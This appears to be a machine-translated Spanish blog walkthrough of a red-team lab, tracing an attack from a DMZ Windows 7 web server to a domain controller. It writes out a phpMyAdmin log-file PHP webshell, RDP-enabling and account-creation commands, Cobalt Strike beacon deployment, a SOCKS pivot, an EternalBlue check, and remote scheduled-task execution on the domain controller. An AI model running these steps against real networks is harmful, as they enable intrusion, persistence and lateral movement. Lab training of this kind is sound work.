Para lograr la penetración de la intranet en este experimento, no podemos infiltrarnos directamente en el servidor de la intranet y el área de la oficina de la intranet, porque la red no está conectada.

Podemos infiltrarnos a través de las computadoras en el área de DMZ. Las computadoras en el área de DMZ tendrán una cierta conexión con el área de oficinas de intranet. Podemos usar las computadoras en el área de DMZ como trampolín para conectarnos al área de oficinas de intranet usando tecnología de túnel. (DNS ICMP SOCKS HTTP SSH), y el área de la oficina tiene cierta conexión con el área del servidor, para que luego podamos ingresar a la intranet.

Una computadora win7 en el área DMZ

Una computadora win2003 en el área de la oficina de intranet

servidor de intranet una computadora win2008

Necesitamos aviones de ataque kali namp ant espada y otras herramientas

3. Proceso de ataque de penetración de intranet

Recopilación de información: IP nombre de dominio subdominio nombre directorio CDN marco de lenguaje whois estructura de arquitectura de buzón

Explotación de vulnerabilidades: Común: SQL XSS XXE CSRF rce carga Middleware: puntales de resorte fastjon vulnerabilidades históricas. . .

Escalada de privilegios: Escalada de privilegios a privilegios de administrador raíz

Mantenimiento de la autoridad: se instala una puerta trasera en el objetivo, el propósito es garantizar que la autoridad no se pierda y que el objetivo haya sido controlado.

Proxy de intranet: cree un proxy o túnel para detectar y acceder a máquinas en la intranet.

Recopilación de intranet: recopilación de información de máquinas locales, recopilación de información dentro del dominio, robo de credenciales de inicio de sesión, detección de host sobreviviente, escaneo de puertos de intranet.

Vulnerabilidad de intranet: utilice herramientas (MSF Nessus nmap) para obtener información de vulnerabilidad relevante del host

Movimiento lateral: el atacante obtiene acceso a la red interna, amplía la autoridad a través de escaneo, voladura, transferencia smb y otras tecnologías, y se mueve en el entorno de red comprometido.

Ataque entre dominios: método de penetración convencional (usando vulnerabilidades web para obtener permisos entre dominios) usando valores de hash de dominio conocidos para realizar ataques de hash pass o ataques de tickets

Limpieza de seguimiento: borre registros del sistema, omita registros y borre seguimientos de operaciones.

2. Construcción del entorno

1. Win7 en el área DMZ

máquina virtual win7

Esta máquina virtual actúa como un servidor web y requiere tarjetas de red duales, que son 192.168.52.143 y 192.168.111.128 respectivamente

Vm3 192.168.52.0 sirve como segmento de red de intranet

Vm4 192.168.111.0 sirve como segmento de red pública

Abra la máquina virtual win7, configúrela, agregue una tarjeta de red, ajústela a la personalizada, VMnet3 y VMnet4.

Inicie la máquina virtual win7, encienda la adaptación de red, conexión local: la primera tarjeta de red

Conexión de área local 4: segunda NIC

Abre el entorno de phpstudy

2. Zona de oficinas de intranet

win2k3, configure la red vm3, la ip está configurada en 192.168.52.141

Win7 ping win2k3 puede hacer ping para demostrar que el entorno no es un problema

La máquina de ataque kali necesita una tarjeta de red dual vm4 como red pública (192.168.111.xxx)

Debido a que esta configuración, Kali puede acceder a Win7 en la DMZ, y luego Win7 tiene una cierta conexión con la intranet, que puede infiltrarse aún más.

Kali hace ping a win7 192.168.111.128 para demostrar que la configuración del entorno es exitosa

3. Host de control de dominio

ganar 2008 tarjeta de red VM3 (192.168.52.xxx)

La IP está configurada como 192.168.52.138

win7 hacer ping a win2008

Inicio de sesión de Win7 con el usuario de dominio DIOS

ping dios.org

usuario de red/dominio

Si usa el usuario stu1, no puede encontrar el dominio usuario net usuario / dominio, debe verificarlo debajo del usuario dios

3. Comienza el ataque

1. Penetración de Win7 en el área DMZ

Propósito: controlar esta computadora a través del escritorio remoto.

1.1 Recopilación de información:

1.ip puerto directorio sitio web desarrollo idioma whois correo electrónico teléfono móvil empresa estructura subdominio. . .

Conozca la dirección IP:

1. Puerto de escaneo (namp)

Barrer algunos puertos

Visita puerto 80

La sonda phpStudy ha realizado algunos cambios sobre la base del phpinfo original. En el proceso de desarrollo, a menudo necesitamos varias configuraciones del servidor, y se utilizan "sondeos" para detectar configuraciones.

Descubrir servicios web (dirsearch Imperial Sword...)

1. Escanear directorio

2. Escanear fondo

Visitamos beifen.rar para descargar el archivo.

página phpinfo.php

página phpmyadmin

Utilice la herramienta de voladura phpmyadmin para copiar primero el sitio web en el archivo txt.

Importe el archivo txt ahora mismo y comience a explotar:

El nombre de usuario y la contraseña son root, ingrese a la página

1.2 Información recopilada

1. Se encuentra que el puerto 80 es una sonda, y parece que no hay forma de usarlo.

2. Descubrí que el sistema web tiene un archivo beifen.rar

3. Encontré que el sistema web tiene una página phpinfo

4. Encontré que el sistema web tiene una página phpmyadmin (interfaz de administración de base de datos)

1.3 El principio del sitio web remoto

1. Es necesario escribir un caballo de Troya en el archivo del servidor ( una oración de un caballo grande y un caballo pequeño, un caballo de Troya, un caballo de memoria, un caballo libre de matar a un caballo, etc. )

2.< ?php evaluación($_POST[1]); ?>

3. ¿Cómo escribirlo? Vulnerabilidad del marco de carga de archivos de inyección SQL . . . . Fue escrito a través de una laguna.

Trucos getshell de Phpmyadmin

Encontré que la contraseña de phpmyadmin es root/root

shell de phpMyAdmin

general_log está desactivado por defecto Actívelo para registrar cada comando ingresado por el usuario y guárdelo en el archivo de registro correspondiente. Puede intentar personalizar el archivo de registro y escribir contenido en el archivo de registro, luego puede obtener shell con éxito:

# Ver la configuración actual

SHOW VARIABLES LIKE 'general%';

Ejecute la sentencia en SQL:

El registro se guarda en el directorio C:\phpStudy\MySQL\data\stu1.log

# Cambiar la ubicación del archivo de registro

establecer general_log global = "ON";

set global general_log_file='C:/phpStudy/WWW/l.php';

Nuestra ruta es la ruta de la sonda phpstudy, por lo que el registro se escribe en la ruta de la sonda y podemos cargar el caballo de Troya para atacar

Ver la configuración la próxima vez

# Escribir carga útil en el registro

select '<?php eval($_POST[1]); ?>';

Eche un vistazo a la página de la sonda y busque en la parte inferior:

Conexión espada hormiga:

Ingrese ip, la contraseña de conexión es un caballo de Troya que escribimos 1

Abra una terminal virtual, ingrese whoami para ver la ipconfig del usuario ver ip

Queremos iniciar sesión en el escritorio de forma remota, así que asegúrese de que el puerto 3389 esté abierto, el comando es el siguiente:

abierto 3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

usuario de red ver usuarios

La conexión remota 192.168.111.128 encontró que se requiere una contraseña

Tenemos dos métodos: 1. Cambiar contraseña de usuario 2. Agregar un nuevo usuario

net user administrator admin@123  #更改密码

net user administrator /active:yes #激活密码

net user username password  /add  #新建用户

se encontró conectado todo el tiempo,

Aparece esta página,

haga clic en sí

Se encuentra que hay verificación de conexión remota en la máquina virtual win7

Apagamos y reiniciamos la computadora en Ant Sword:

apagar -r -t 0

Conexión remota al encender ¡Conexión exitosa! ! !

Resumir:

El primer dron objetivo fue derribado, y aquí utilizamos la recopilación de información y la explotación de vulnerabilidades.

Recopilación de información: el puerto abierto se escaneó a través de la ip y encontramos la sonda phpstudy en la página phpmyadmin a través del puerto.

Explotación de vulnerabilidades: use getshell para escribir un caballo de Troya de una oración en la página de phpmyadmin, conéctese con Ant Sword, cree un usuario o cambie la contraseña para la conexión de escritorio remoto y apague la computadora en el área DMZ.

2. Penetración del área de la oficina de la intranet (host en el dominio)

Queremos ingresar a la intranet, si ingresamos directamente, no funcionará, la red no está en el mismo segmento, por lo que necesitamos usar win7 como trampolín para ingresar al host de dominio win2003

Definitivamente es imposible hacer ping a win2003 desde esta máquina

Ant espada win7 ping a través de win2k3 demuestra que la configuración está bien

Después de obtener el shell web, por lo general, la máquina se conectará a cs y msf (después de la infiltración)

MSF es la línea de comandos CS es la interfaz gráfica de MSF

MSF CS (porque estas dos herramientas integran la escalada de privilegios con un solo clic para abrir un proxy para escanear túneles, etc.)

Agregue una tarjeta de red vm4 (192.168.111.130) a kali

Kali ping win7 (192.168.111.128) demuestra que el entorno está bien

2.1 Ir en línea a CS

1. Ejecute el servidor bash teamserver kali ip (192.168.111.130) contraseña (123456) en kali

2. Ejecute el cliente bash cobaltstrike.sh

ip es kali ip post es el puerto 9081 del servidor que se esta ejecutando, la contraseña es 123456

3. Produce un oyente

agregue agregue un nombre a cualquier puerto y escriba uno poco común.

El troyano se conecta al oyente, y el oyente regresa al servidor, y el contenido del servidor está en esta página.

4. Generar un troyano

Conectar con el beso del oyente

Guárdelo en el escritorio, asígnele un nombre

5. Sube MSB.exe a win7 con Ant Sword

dir ver MSB.exe ejecutar

Regrese a kali y conéctese en línea con éxito

El sueño de la sesión se cambia a 1, y la respuesta es de 1 segundo

ingrese la línea de comando

Ver shell de comando whoami ipconfig

Ver impresión de ruta de shell de enrutamiento

Ver arp, dirección ip de intranet encontrar ip de destino

Se debe hacer ping a ping192.168.52.141 (win2k3)

2.2 Puerto de escucha MSF

CS agrega un monitor msf

Engendro enviado a msf

¡Se descubrió que el ataque meterpreter fue exitoso! ! ! De esta manera, msf también penetró en win7

2.3 Construye un túnel de calcetines

Haga clic con el botón derecho en el servidor Rivoting Socks

configurar el puerto 34456 (puerto)

Túnel abierto con éxito

Ver información del túnel

Haga clic en Túnel para generar código

copiar enlace de código

setg Proxies socks4:192.168.111.130:34456

Devoluciones de fondo en msf

Establezca el túnel msf en 192.168.111.130, el puerto es 34456

Ahora nuestro msf puede jugar intranet

Compruebe win2k3 para la vulnerabilidad de Eternal Blue

El número de serie 3 corresponde a comprobar si existe una vulnerabilidad de Eternal Blue

use 3  #使用序号3
show options  #查看配置内容
set rhosts 192.168.52.141  #设置目标地址
run #运行

Descubrí que hay una vulnerabilidad azul eterna en win 2003

Usamos 0 ms17_eternablue para encontrar que el sistema puede ser demasiado antiguo si no puede funcionar

Pero podemos aprovechar el uso de 2 cmd

ver whoami

Ver dirección IP ipconfig

Resumir:

1. Conéctese en línea al CS y MSF del host del controlador de dominio

2. Cree un proxy de calcetines

3. A través del agente de conexión MSF para controlar el host de la intranet 2003

3. Penetración del entorno de dominio (controlador de dominio)

3.1 El concepto de entorno de dominio

nombre de la computadora win7 y dominio del grupo de trabajo

Utilizo la escuela corporativa para introducir la comprensión de los grupos de trabajo y los dominios.

Grupo de trabajo: agrupe las computadoras en grupos para facilitar la administración por parte de los administradores.

Por ejemplo, una empresa tiene 100 personas (100 computadoras) La empresa tiene varios departamentos, como el Departamento de Recursos Humanos, el Departamento de Operación y Mantenimiento, el Departamento de Finanzas, el Departamento de TI, etc.

¿Cuáles son las desventajas de esto? ? ?

No hay disciplina ni mecanismo de gestión unificado.

Por ejemplo, la pequeña K trabaja en el departamento de TI, y mi jovencita favorita está en el departamento de personal. Mañana, la pequeña K irá directamente a trabajar en el departamento de personal.

El gerente pidió a todos los empleados que reemplazaran sus computadoras con fondos de pantalla de cultura corporativa para que no pudieran tener el software A, pero Xiao K no lo escuchó, sino que en lugar de cambiar el fondo de pantalla, descargó el software A.

De esta forma surge el concepto de dominio.

Únase al administrador de red en el dominio (similar al profesor de la clase de estudiante): el rol de administración unificada (controlador de dominio)

Máquina intradominio: como empleados (estudiantes)

En una computadora, el administrador de red permite que los empleados usen el fondo de pantalla que deseen, les permite usar cualquier software que tengan, les permite apagar cuando lo deseen y establece contraseñas para una administración unificada, etc.

Grado 1 Clase 1 (Clase Rocket: Nombre de dominio)

Profesor principal (líder): controlador de dominio

Estudiantes: máquinas en el dominio

Nota: una computadora solo puede unirse a un dominio. Por ejemplo, un estudiante solo puede unirse a una clase.

Puede haber varios controladores de dominio en un dominio. Por ejemplo, una clase tiene más de un director y un maestro.

Muy importante

Usuarios locales (pueblos indígenas): usuarios locales (las cuentas y contraseñas se almacenan en máquinas locales)

Usuario de dominio: es el usuario que se une al dominio (es decir, la cuenta y la contraseña se almacenan en el controlador de dominio). Generalmente, la empresa agrega el dominio y el hogar personal no agrega el dominio.

Encuentra un controlador de dominio Cómo ver si hay un dominio

¿Cómo unirse al dominio? ? ?

El DNS de la computadora host primero selecciona la ip del servidor de dominio, luego completa el nombre de dominio que se unirá en las propiedades de la computadora, ingresa la contraseña de la cuenta del servidor de dominio y finalmente se une al dominio.

Un servidor de dominio puede agregar un usuario para establecer una contraseña para iniciar sesión en la computadora host.

host win7DMZ

Dios\administrador usuario de control de dominio

Stu1\usuario local administrador

3.2 Determinar el dominio

Shell whoami en kali comprueba que el usuario es dios. En este momento, no sabemos si es un usuario de control de dominio. En este momento, usamos

shell hostname Verifique el nombre de la computadora y devuelva stu1 Si es un usuario local, debe ser stu1\xxx, así que supongo que dios es un usuario de control de dominio.

O bien, el método más directo y simple shell ipconfig/all puede ver claramente que el nombre de host stu1 dns sufijo es god.org

3.3 Recopilación de información dentro del dominio

¿Dónde está el controlador de dominio de consulta?

nslookup -type=SRV _ldap._tcp

Ver la ip del controlador de dominio 192.168.52.138 (win2008) nombre del controlador de dominio owa dirección de nombre de dominio god.org

Consultar cuantos usuarios hay en el dominio

net user /domain

Estos usuarios están todos en el controlador de dominio

Consultar cuantos equipos hay en el dominio

net group "domain computers" /domain

stu1 es la computadora que controlamos

Consultar el nombre del controlador de dominio

net group "Domain Controllers" /domain

OWA

3.4 Conectarse a través de CS sin conectarse

generar un oyente

Generar archivos troyanos

Se genera un caballo de Troya (un caballo de Troya que puede conectarse pero no conectarse)

¿Cómo se transmite el caballo de Troya al controlador de dominio? ? ?

Ver contraseña de administrador del controlador de dominio

3.5 Establecer una conexión de comunicación entre procesos IPC

La IP y la contraseña son de control de dominio win2008

shell net use \\192.168.52.138\ipc$ "GODl123" /user:god\administrator

 shell net use  #查看连接

Ahora se ha establecido una conexión con el controlador de dominio, lo que demuestra que confían el uno en el otro y pueden transferir archivos.

Échale un vistazo

Copie el archivo en la computadora del controlador de dominio

copy beacon.exe \\192.168.52.138\c$

host de control de dominio win2008

Crear una tarea programada remota

schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f

correr

schtasks /run /s 192.168.52.138 /i /tn "test"

conectar

connect（link）目标ip 192.168.52.138

Ver controlador de dominio whoami ipconfig

Verifique la contraseña (porque mi controlador de dominio win2008 y springboard win7 establecieron la misma contraseña)

Comando para ver las contraseñas de inicio de sesión

Degradar el sistema a administrador

shell schtasks /create /s 192.168.52.138 /tn test1 /sc onstart /tr c:\beacon.exe /ru administrator /f  #创建 目标ip 文件名test 木马beacon.exe 用户administrator

shell schtasks /run /s 192.168.52.138 /i /tn "test1"   #运行 
connect（link） 192.168.52.138

3.6 Movimiento lateral

De hecho, cs integra la conexión con un solo clic.

Conexión con un clic al controlador de dominio en el dominio

.138 es controlador de dominio

De esta manera, ir directamente al controlador de dominio

El host del controlador de dominio controla los hosts en el dominio

Queremos estar en línea win2k3 192.168.52.141

Éxito en línea win2003

Resumir:

1. Identificar usuarios de dominio y usuarios locales, y recopilar información en el dominio.

2. Use CS para conectarse sin conectarse, generar caballos de Troya, verificar contraseñas de dominio y establecer conexiones de comunicación IPC.

3. Movimiento horizontal, penetración mutua entre el host del controlador de dominio y el host del dominio.

Penetración de intranet del campo de tiro del equipo rojo (penetración desde el host DMZ a la máquina de dominio)

Tabla de contenido

1. Penetración de intranet en el campo de tiro del equipo rojo

1. Descarga de la herramienta Target Drone

2. Diagrama de topología de red de este experimento

3. Proceso de ataque de penetración de intranet

2. Construcción del entorno

1. Win7 en el área DMZ

2. Zona de oficinas de intranet

3. Host de control de dominio

3. Comienza el ataque

1. Penetración de Win7 en el área DMZ

1.1 Recopilación de información:

1.2 Información recopilada

1.3 El principio del sitio web remoto

Resumir:

2. Penetración del área de la oficina de la intranet (host en el dominio)

2.1 Ir en línea a CS

2.2 Puerto de escucha MSF

2.3 Construye un túnel de calcetines

Resumir:

3. Penetración del entorno de dominio (controlador de dominio)

3.1 El concepto de entorno de dominio

3.2 Determinar el dominio

3.4 Conectarse a través de CS sin conectarse

3.5 Establecer una conexión de comunicación entre procesos IPC

3.6 Movimiento lateral

Resumir:

Supongo que te gusta